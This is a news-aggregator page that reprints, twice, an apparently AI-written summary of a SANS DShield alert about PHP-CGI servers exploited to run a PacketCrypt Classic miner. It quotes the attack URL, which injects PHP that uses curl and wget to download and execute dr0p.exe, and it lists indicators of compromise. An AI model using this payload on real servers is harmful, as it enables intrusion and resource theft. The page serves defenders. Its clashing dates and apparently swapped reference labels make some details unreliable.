<!-- wp:paragraph -->The SANS DShield project receives a wide variety of logs submitted by participants of the DShield project. Looking at the ââ URLs page, I observed an interesting URL and dived deeper to investigate. The URL recorded is as follows:
📰 IT Security
🛡️ PacketCrypt Classic Cryptocurrency Miner on PHP Servers, (Tue, Jan 7th)
AI Executive Summary & Key Takeaways
<p><strong>Overview:</strong><br />
A cybersecurity alert has been issued regarding the exploitation of vulnerable PHP servers to mine <strong>PacketCrypt Classic (PKTC)</strong> cryptocurrency. The attack leverages a malicious URL that downloads and executes a remote payload, potentially compromising systems and draining resources for mining purposes. This incident highlights the risks associated with unpatched or misconfigured web servers. </p>
<hr />
<p><strong>Discovery and Exploit Details:</strong><br />
The SANS DShield project detected a suspicious URL:<br />
<code>/cgi-bin/php-cgi.exe?arg=Content-Type: text/plain <?php system('curl -L -k -O http://[redacted]/dr0p.exe && ./dr0p.exe || wget --no-check-certificate http://[redacted]/dr0p.exe && ...</code> </p>
<p>This URL, when accessed, downloads and executes a malicious file named <strong>dr0p.exe</strong>, which is linked to the <strong>PacketCrypt Classic (PKTC)</strong> mining operation. The exploit targets PHP servers with known vulnerabilities or misconfigurations that allow unrestricted public access to execution environments. </p>
<p><strong>Malware Analysis:</strong><br />
- <strong>dr0p.exe</strong>: A backdoor designed to download and run a secondary payload, likely for cryptocurrency mining. Its SHA256 hash is:<br />
<code>d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36</code> </p>
<ul>
<li>
<p><strong>pkt1.exe</strong>: Another malicious component with hash:<br />
<code>e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562</code> </p>
</li>
<li>
<p><strong>packetcrypt.exe</strong>: A broader mining tool with hash:<br />
<code>717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397</code> </p>
</li>
</ul>
<p>The malware connects to an IP address <strong>23.27.51.244</strong>, which is associated with the <strong>EvilBit Block Explorer</strong> (port 80) and has open ports for SSH, HTTP, and mining-related traffic (ports 22, 80, 110, 6664). </p>
<hr />
<p><strong>Wallet Activity and Implications:</strong><br />
The malicious payload was observed to interact with a <strong>PKTC wallet address</strong>:<br />
<code>pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a</code> </p>
<p>According to the PKTC blockchain explorer, this wallet has accumulated <strong>5 PKTC</strong> (approximately <strong>0.0021785 USDT</strong> as of current exchange rates). This suggests the attacker is using the compromised servers for mining operations, which could be part of a larger scheme to generate cryptocurrency for illicit purposes or network disruption. </p>
<hr />
<p><strong>Background on PacketCrypt Classic (PKTC):</strong><br />
- <strong>PKTC (PacketCrypt Classic)</strong>: A legacy proof-of-work cryptocurrency that transitioned to a stake-based model in 2023, now known as the <strong>PKT project</strong>.<br />
- <strong>Key Difference</strong>: PKTC is the older version of the cryptocurrency, while the current PKT uses a "Stake-to-Earn" mechanism. The malware targets PKTC, which remains active for historical or legacy purposes. </p>
<hr />
<p><strong>Indicators of Compromise (IoCs):</strong><br />
1. <strong>IP Address</strong>: <code>23.27.51.244</code><br />
2. <strong>Malware Hashes</strong>:<br />
- dr0p.exe: <code>d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36</code><br />
- pkt1.exe: <code>e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562</code><br />
- packetcrypt.exe: <code>717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397</code><br />
3. <strong>Wallet Address</strong>: <code>pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a</code> </p>
<hr />
<p><strong>Recommendations for System Administrators:</strong><br />
- <strong>Audit PHP Servers</strong>: Ensure all servers are patched against known vulnerabilities (e.g., PHP remote code execution flaws).<br />
- <strong>Restrict Execution Permissions</strong>: Limit access to <code>cgi-bin/</code> or <code>php-cgi.exe</code> to authorized users only.<br />
- <strong>Monitor Network Traffic</strong>: Track connections to suspicious IP addresses and ports, especially those associated with mining software. </p>
<hr />
<p><strong>References:</strong><br />
1. <a href="https://www.virustotal.com/gui/file/d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36">VirusTotal Analysis</a><br />
2. <a href="https://crypto.pkt.cash/announcements/pktclassic-adopts-new-ticker-pktc/">PKTC Wallet Explorer</a><br />
3. <a href="https://www.pkt.world/explorer?wallet=pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a&minutes=1440&pools=all">PKT Classic to PKT Transition</a> </p>
<p><strong>Author:</strong> Yee Ching Tok, Ph.D., ISC Handler | SANS DShield Team </p>
<hr />
<p><em>Note: This alert is based on analysis of the SANS DShield project and does not confirm active exploitation. System administrators are urged to prioritize server security to prevent such incidents.</em></p><!-- END: Dynamically Added Content -->
<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr><p><strong>Title: PacketCrypt Classic Cryptocurrency Miner Exploits Vulnerable PHP Servers (Jan 15, 2025)</strong> </p>
<p><strong>Overview:</strong><br />
A cybersecurity alert has been issued regarding the exploitation of vulnerable PHP servers to mine <strong>PacketCrypt Classic (PKTC)</strong> cryptocurrency. The attack leverages a malicious URL that downloads and executes a remote payload, potentially compromising systems and draining resources for mining purposes. This incident highlights the risks associated with unpatched or misconfigured web servers. </p>
<hr />
<p><strong>Discovery and Exploit Details:</strong><br />
The SANS DShield project detected a suspicious URL:<br />
<code>/cgi-bin/php-cgi.exe?arg=Content-Type: text/plain <?php system('curl -L -k -O http://[redacted]/dr0p.exe && ./dr0p.exe || wget --no-check-certificate http://[redacted]/dr0p.exe && ...</code> </p>
<p>This URL, when accessed, downloads and executes a malicious file named <strong>dr0p.exe</strong>, which is linked to the <strong>PacketCrypt Classic (PKTC)</strong> mining operation. The exploit targets PHP servers with known vulnerabilities or misconfigurations that allow unrestricted public access to execution environments. </p>
<p><strong>Malware Analysis:</strong><br />
- <strong>dr0p.exe</strong>: A backdoor designed to download and run a secondary payload, likely for cryptocurrency mining. Its SHA256 hash is:<br />
<code>d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36</code> </p>
<ul>
<li>
<p><strong>pkt1.exe</strong>: Another malicious component with hash:<br />
<code>e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562</code> </p>
</li>
<li>
<p><strong>packetcrypt.exe</strong>: A broader mining tool with hash:<br />
<code>717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397</code> </p>
</li>
</ul>
<p>The malware connects to an IP address <strong>23.27.51.244</strong>, which is associated with the <strong>EvilBit Block Explorer</strong> (port 80) and has open ports for SSH, HTTP, and mining-related traffic (ports 22, 80, 110, 6664). </p>
<hr />
<p><strong>Wallet Activity and Implications:</strong><br />
The malicious payload was observed to interact with a <strong>PKTC wallet address</strong>:<br />
<code>pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a</code> </p>
<p>According to the PKTC blockchain explorer, this wallet has accumulated <strong>5 PKTC</strong> (approximately <strong>0.0021785 USDT</strong> as of current exchange rates). This suggests the attacker is using the compromised servers for mining operations, which could be part of a larger scheme to generate cryptocurrency for illicit purposes or network disruption. </p>
<hr />
<p><strong>Background on PacketCrypt Classic (PKTC):</strong><br />
- <strong>PKTC (PacketCrypt Classic)</strong>: A legacy proof-of-work cryptocurrency that transitioned to a stake-based model in 2023, now known as the <strong>PKT project</strong>.<br />
- <strong>Key Difference</strong>: PKTC is the older version of the cryptocurrency, while the current PKT uses a "Stake-to-Earn" mechanism. The malware targets PKTC, which remains active for historical or legacy purposes. </p>
<hr />
<p><strong>Indicators of Compromise (IoCs):</strong><br />
1. <strong>IP Address</strong>: <code>23.27.51.244</code><br />
2. <strong>Malware Hashes</strong>:<br />
- dr0p.exe: <code>d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36</code><br />
- pkt1.exe: <code>e3d0c31608917c0d7184c220d2510848f6267952c38f86926b15fb53d07bd562</code><br />
- packetcrypt.exe: <code>717fe92a00ab25cae8a46265293e3d1f25b2326ecd31406e7a2821853c64d397</code><br />
3. <strong>Wallet Address</strong>: <code>pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a</code> </p>
<hr />
<p><strong>Recommendations for System Administrators:</strong><br />
- <strong>Audit PHP Servers</strong>: Ensure all servers are patched against known vulnerabilities (e.g., PHP remote code execution flaws).<br />
- <strong>Restrict Execution Permissions</strong>: Limit access to <code>cgi-bin/</code> or <code>php-cgi.exe</code> to authorized users only.<br />
- <strong>Monitor Network Traffic</strong>: Track connections to suspicious IP addresses and ports, especially those associated with mining software. </p>
<hr />
<p><strong>References:</strong><br />
1. <a href="https://www.virustotal.com/gui/file/d078d8690446e831acc794ee2df5dfabcc5299493e7198993149e3c0c33ccb36">VirusTotal Analysis</a><br />
2. <a href="https://crypto.pkt.cash/announcements/pktclassic-adopts-new-ticker-pktc/">PKTC Wallet Explorer</a><br />
3. <a href="https://www.pkt.world/explorer?wallet=pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a&minutes=1440&pools=all">PKT Classic to PKT Transition</a> </p>
<p><strong>Author:</strong> Yee Ching Tok, Ph.D., ISC Handler | SANS DShield Team </p>
<hr />
<p><em>Note: This alert is based on analysis of the SANS DShield project and does not confirm active exploitation. System administrators are urged to prioritize server security to prevent such incidents.</em></p><!-- END: Dynamically Added Content -->
Verwandte Videos & News · KI-empfohlen via Levenshtein-Match
← Horizontal scrollen für mehr Empfehlungen → · Klick auf ein Video zum Abspielen im Hauptplayer